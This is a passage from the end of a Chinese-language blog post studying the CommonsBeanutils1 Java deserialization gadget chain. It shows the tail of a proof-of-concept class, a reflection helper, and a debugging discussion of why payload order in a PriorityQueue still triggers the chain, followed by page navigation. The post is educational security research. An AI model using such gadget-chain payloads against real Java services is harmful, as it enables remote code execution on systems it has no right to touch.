class="variable">o</span> <span class="operator">=</span> (Object) ois.readObject();</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">setFieldValue</span><span class="params">(Object obj, String fieldName, Object value)</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> obj.getClass().getDeclaredField(fieldName);</span><br><span class="line">            field.setAccessible(<span class="literal">true</span>);</span><br><span class="line">            field.set(obj, value);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="Q-为什么反射设置new-Object-paylaodObj-payloadObj2-为不同的顺序仍然会触发"><a href="#Q-为什么反射设置new-Object-paylaodObj-payloadObj2-为不同的顺序仍然会触发" class="headerlink" title="Q: 为什么反射设置new Object[] {paylaodObj, payloadObj2}为不同的顺序仍然会触发"></a>Q: 为什么反射设置<code>new Object[] &#123;paylaodObj, payloadObj2&#125;</code>为不同的顺序仍然会触发</h2><blockquote>
<p>其实不用太纠结这种小细节，实战中的标准在于!!!保证触发!!! –&gt; 只要能触发就是好payload</p>
</blockquote>
<ol>
<li><p>明确一下目的，断点打在PriorityQueue的readObject()</p>
</li>
<li><p>进入发现不同顺序的话在<code>heapify()</code>之前都是按照我们设置的顺序来的，所以问题在之后</p>
</li>
<li><p>进入heapify()，推测报错时应该时触发，一直调到报错，进入函数，发现在比较时顺序也是按照设置的那样</p>
</li>
<li><p>A: 问题出在其实为不设置getOutputProperties()这里触发payload也不会报错，所以最终还是会到触发payload那里，也算是清晰了</p>
 <figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// BeanComparator.java</span></span><br><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    <span class="keyword">final</span> <span class="type">Object</span> <span class="variable">value1</span> <span class="operator">=</span> PropertyUtils.getProperty( o1, property );    <span class="comment">// 这里是payloadOb2是也不会报错，会继续</span></span><br><span class="line">    <span class="keyword">final</span> <span class="type">Object</span> <span class="variable">value2</span> <span class="operator">=</span> PropertyUtils.getProperty( o2, property );</span><br><span class="line">    <span class="keyword">return</span> internalCompare( value1, value2 );</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure></li>
</ol>
<h2 id="Debug之法大也"><a href="#Debug之法大也" class="headerlink" title="Debug之法大也"></a>Debug之法大也</h2><ol>
<li>明确目的</li>
<li>先找到入口点，别一开始就太过精确死磕某个点，直接从外部包围内部<ol>
<li>比如这里调试先别一下到BeanComparator的<code>compare()</code>里，而是先到PriorityQueue的<code>readObject()</code>这里，<strong>跟着流走</strong></li>
</ol>
</li>
<li>不断明确在每一步中有哪里不对，这一步不清楚可以想想以前的</li>
<li>先宏观再整体，可以推测是否再报错时出现问题，如果时先找报错点进入，有时可以先跳过具体先看流后面来<strong>夹逼定位</strong></li>
<li>如果<strong>一直徘徊而且是不知道原因的</strong>，可以往前看，像这里的顺序问题，找到readObject那里就清晰了</li>
</ol>
<h2 id="Ref"><a href="#Ref" class="headerlink" title="Ref"></a>Ref</h2><ol>
<li>java安全漫谈</li>
<li>还是大佬</li>
</ol>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/tags/">Tag</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE"><span class="toc-number">1.</span> <span class="toc-text">环境配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#commons-beanutils"><span class="toc-number">2.</span> <span class="toc-text">commons-beanutils</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TemplatesImpl-getOutputProperties"><span class="toc-number">3.</span> <span class="toc-text">TemplatesImpl.getOutputProperties()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#BeanComparator"><span class="toc-number">4.</span> <span class="toc-text">BeanComparator</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Gadget-CC2-XX-CC3"><span class="toc-number">5.</span> <span class="toc-text">Gadget: CC2+XX+CC3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CommonsBeanutils1-poc"><span class="toc-number">6.</span> <span class="toc-text">CommonsBeanutils1 poc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Q-%E4%B8%BA%E4%BB%80%E4%B9%88%E5%8F%8D%E5%B0%84%E8%AE%BE%E7%BD%AEnew-Object-paylaodObj-payloadObj2-%E4%B8%BA%E4%B8%8D%E5%90%8C%E7%9A%84%E9%A1%BA%E5%BA%8F%E4%BB%8D%E7%84%B6%E4%BC%9A%E8%A7%A6%E5%8F%91"><span class="toc-number">7.</span> <span class="toc-text">Q: 为什么反射设置new Object[] {paylaodObj, payloadObj2}为不同的顺序仍然会触发</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Debug%E4%B9%8B%E6%B3%95%E5%A4%A7%E4%B9%9F"><span class="toc-number">8.</span> <span class="toc-text">Debug之法大也</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Ref"><span class="toc-number">9.</span> <span class="toc-text">Ref</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&text=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&title=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&is_video=false&description=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Java安全5(11)_CommonsBeanutils1&body=Check out this article: https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&title=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&title=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&title=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&title=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&name=Java安全5(11)_CommonsBeanutils1&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&t=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2023-2025
    KC1zs4&#39;s Blog
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

  
<script src="/js/search.js"></script>

  <script type="text/javascript">
  $(function() {

    var $inputArea = $("input#search-input");
    var $resultArea = document.querySelector("div#search-result");

    $inputArea.focus(function() {
      var search_path = "search.xml";
      if (search_path.length == 0) {
        search_path = "search.xml";
      }
      var path = "/" + search_path;
      searchFunc(path, 'search-input', 'search-result');
    });

    $inputArea.keydown(function(e) {
      if (e.which == 13) {
        e.preventDefault();
      }
    });

    var observer = new MutationObserver(function(mutationsList, observer) {
      if (mutationsList.length == 1) {
        if (mutationsList[0].addedNodes.length) {
          $(".search-no-result").hide();
        } else if (mutationsList[0].removedNodes.length) {
          $(".search-no-result").show(200);
        }
      }
    });

    observer.observe($resultArea, { childList: true });

  });
  </script>

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'kc1zs4-github-io';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->

</body>
</html>
